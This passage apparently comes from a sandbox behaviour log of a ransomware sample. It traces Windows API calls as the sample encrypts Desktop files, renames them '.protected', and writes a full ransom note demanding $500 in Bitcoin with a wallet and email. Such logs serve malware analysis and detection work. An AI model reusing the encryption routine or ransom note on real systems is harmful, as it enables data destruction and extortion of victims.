pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RO_pQkhqW-tc 83RVO.xls.protected") returned 135 [0091.198] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RO_pQkhqW-tc 83RVO.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\ro_pqkhqw-tc 83rvo.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RO_pQkhqW-tc 83RVO.xls.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\ro_pqkhqw-tc 83rvo.xls.protected")) returned 1 [0091.199] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0091.199] lstrcmpiW (lpString1="s3esEghE tQRaK.png", lpString2="Windows") returned -1 [0091.199] lstrcmpiW (lpString1="s3esEghE tQRaK.png", lpString2="Program Files") returned 1 [0091.199] lstrcmpiW (lpString1="s3esEghE tQRaK.png", lpString2="Program Files (x86)") returned 1 [0091.199] lstrcmpiW (lpString1="s3esEghE tQRaK.png", lpString2="$Recycle.bin") returned 1 [0091.199] lstrcmpiW (lpString1="s3esEghE tQRaK.png", lpString2="System Volume Information") returned -1 [0091.199] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\s3esEghE tQRaK.png") returned 121 [0091.199] StrStrIW (lpFirst="s3esEghE tQRaK.png", lpSrch=".protected") returned 0x0 [0091.199] lstrcmpW (lpString1="s3esEghE tQRaK.png", lpString2="RESTORE_FILES.txt") returned 1 [0091.199] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0091.199] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0091.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\s3esEghE tQRaK.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\s3eseghe tqrak.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0091.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\s3esEghE tQRaK.png") returned 121 [0091.199] StrStrW (lpFirst="s3esEghE tQRaK.png", lpSrch=".txt") returned 0x0 [0091.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\s3esEghE tQRaK.png") returned 121 [0091.199] StrStrW (lpFirst="s3esEghE tQRaK.png", lpSrch=".rar") returned 0x0 [0091.199] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\s3esEghE tQRaK.png") returned 121 [0091.199] StrStrW (lpFirst="s3esEghE tQRaK.png", lpSrch=".zip") returned 0x0 [0091.199] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.200] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.200] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.200] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.200] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0091.200] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0091.200] CloseHandle (hObject=0x150) returned 1 [0091.201] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\s3esEghE tQRaK.png.protected") returned 131 [0091.201] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\s3esEghE tQRaK.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\s3eseghe tqrak.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\s3esEghE tQRaK.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\s3eseghe tqrak.png.protected")) returned 1 [0091.201] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0091.201] lstrcmpiW (lpString1="XNxBnWQvS.csv", lpString2="Windows") returned 1 [0091.201] lstrcmpiW (lpString1="XNxBnWQvS.csv", lpString2="Program Files") returned 1 [0091.201] lstrcmpiW (lpString1="XNxBnWQvS.csv", lpString2="Program Files (x86)") returned 1 [0091.201] lstrcmpiW (lpString1="XNxBnWQvS.csv", lpString2="$Recycle.bin") returned 1 [0091.201] lstrcmpiW (lpString1="XNxBnWQvS.csv", lpString2="System Volume Information") returned 1 [0091.201] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\XNxBnWQvS.csv") returned 116 [0091.201] StrStrIW (lpFirst="XNxBnWQvS.csv", lpSrch=".protected") returned 0x0 [0091.201] lstrcmpW (lpString1="XNxBnWQvS.csv", lpString2="RESTORE_FILES.txt") returned 1 [0091.201] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0091.201] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0091.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\XNxBnWQvS.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\xnxbnwqvs.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0091.202] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\XNxBnWQvS.csv") returned 116 [0091.202] StrStrW (lpFirst="XNxBnWQvS.csv", lpSrch=".txt") returned 0x0 [0091.202] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\XNxBnWQvS.csv") returned 116 [0091.202] StrStrW (lpFirst="XNxBnWQvS.csv", lpSrch=".rar") returned 0x0 [0091.202] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\XNxBnWQvS.csv") returned 116 [0091.202] StrStrW (lpFirst="XNxBnWQvS.csv", lpSrch=".zip") returned 0x0 [0091.202] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x17f0, lpOverlapped=0x0) returned 1 [0091.202] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe810, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.202] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x17f0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x17f0, lpOverlapped=0x0) returned 1 [0091.202] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.203] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0091.203] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0091.203] CloseHandle (hObject=0x150) returned 1 [0091.203] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\XNxBnWQvS.csv.protected") returned 126 [0091.203] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\XNxBnWQvS.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\xnxbnwqvs.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\XNxBnWQvS.csv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\xnxbnwqvs.csv.protected")) returned 1 [0091.205] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0091.205] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0091.205] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RESTORE_FILES.txt") returned 120 [0091.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.205] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.205] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0091.206] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.206] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0091.206] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.206] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0091.206] CloseHandle (hObject=0x14c) returned 1 [0091.207] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.207] lstrcmpiW (lpString1="tECR.m4a", lpString2="Windows") returned -1 [0091.207] lstrcmpiW (lpString1="tECR.m4a", lpString2="Program Files") returned 1 [0091.207] lstrcmpiW (lpString1="tECR.m4a", lpString2="Program Files (x86)") returned 1 [0091.207] lstrcmpiW (lpString1="tECR.m4a", lpString2="$Recycle.bin") returned 1 [0091.207] lstrcmpiW (lpString1="tECR.m4a", lpString2="System Volume Information") returned 1 [0091.207] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\tECR.m4a") returned 93 [0091.207] StrStrIW (lpFirst="tECR.m4a", lpSrch=".protected") returned 0x0 [0091.207] lstrcmpW (lpString1="tECR.m4a", lpString2="RESTORE_FILES.txt") returned 1 [0091.207] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.207] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\tECR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\tecr.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.207] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\tECR.m4a") returned 93 [0091.207] StrStrW (lpFirst="tECR.m4a", lpSrch=".txt") returned 0x0 [0091.207] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\tECR.m4a") returned 93 [0091.207] StrStrW (lpFirst="tECR.m4a", lpSrch=".rar") returned 0x0 [0091.207] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\tECR.m4a") returned 93 [0091.207] StrStrW (lpFirst="tECR.m4a", lpSrch=".zip") returned 0x0 [0091.207] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.208] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.208] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.208] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.208] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.208] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.208] CloseHandle (hObject=0x14c) returned 1 [0091.209] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\tECR.m4a.protected") returned 103 [0091.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\tECR.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\tecr.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\tECR.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\tecr.m4a.protected")) returned 1 [0091.209] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.209] lstrcmpiW (lpString1="uGs-KX.png", lpString2="Windows") returned -1 [0091.209] lstrcmpiW (lpString1="uGs-KX.png", lpString2="Program Files") returned 1 [0091.209] lstrcmpiW (lpString1="uGs-KX.png", lpString2="Program Files (x86)") returned 1 [0091.209] lstrcmpiW (lpString1="uGs-KX.png", lpString2="$Recycle.bin") returned 1 [0091.209] lstrcmpiW (lpString1="uGs-KX.png", lpString2="System Volume Information") returned 1 [0091.209] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\uGs-KX.png") returned 95 [0091.209] StrStrIW (lpFirst="uGs-KX.png", lpSrch=".protected") returned 0x0 [0091.209] lstrcmpW (lpString1="uGs-KX.png", lpString2="RESTORE_FILES.txt") returned 1 [0091.209] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.210] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\uGs-KX.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\ugs-kx.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\uGs-KX.png") returned 95 [0091.210] StrStrW (lpFirst="uGs-KX.png", lpSrch=".txt") returned 0x0 [0091.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\uGs-KX.png") returned 95 [0091.210] StrStrW (lpFirst="uGs-KX.png", lpSrch=".rar") returned 0x0 [0091.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\uGs-KX.png") returned 95 [0091.210] StrStrW (lpFirst="uGs-KX.png", lpSrch=".zip") returned 0x0 [0091.210] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.211] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.211] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.211] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.211] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.211] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.211] CloseHandle (hObject=0x14c) returned 1 [0091.211] wnsprintfW (in: pszDest=0x4dfbb0, 